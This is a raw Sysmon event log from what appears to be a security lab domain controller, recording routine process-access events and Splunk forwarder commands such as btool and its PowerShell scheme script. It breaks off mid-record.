15:53:05.130{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005824Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.130{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005823Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.130{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005822Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.130{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005821Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.130{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005820Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.130{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005819Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.130{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005818Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.130{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005817Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.130{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005816Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.130{D28789B6-7C62-5FA1-0500-000000008801}644804C:\Windows\system32\csrss.exe{D28789B6-7CE1-5FA1-3801-000000008801}2136C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005815Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.130{D28789B6-7CDE-5FA1-2301-000000008801}35642604C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{D28789B6-7CE1-5FA1-3801-000000008801}2136C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+43bc6|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+18274|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000005814Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.142{D28789B6-7CE1-5FA1-3801-000000008801}2136C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c btool server list replication_port --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{D28789B6-7CDE-5FA1-2301-000000008801}3564C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 10341000x80000000000000005813Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.068{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7CE0-5FA1-3701-000000008801}4516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005812Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.052{D28789B6-7CE0-5FA1-3701-000000008801}45164144C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{D28789B6-7CDA-5FA1-0E01-000000008801}1592C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+116e675|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+f344c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006199Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.914{D28789B6-7CDA-5FA1-1201-000000008801}38764476C:\Windows\system32\conhost.exe{D28789B6-7CE2-5FA1-5301-000000008801}1568C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006198Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.914{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006197Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.914{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006196Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.914{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006195Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.914{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006194Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.914{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006193Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.914{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006192Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.914{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006191Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.914{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006190Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.914{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006189Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.914{D28789B6-7C62-5FA1-0500-000000008801}6441152C:\Windows\system32\csrss.exe{D28789B6-7CE2-5FA1-5301-000000008801}1568C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006188Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.914{D28789B6-7CDA-5FA1-0E01-000000008801}15924444C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{D28789B6-7CE2-5FA1-5301-000000008801}1568C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000006187Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.916{D28789B6-7CE2-5FA1-5301-000000008801}1568C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\powershell2.cmd" --scheme"C:\Windows\system32\NT 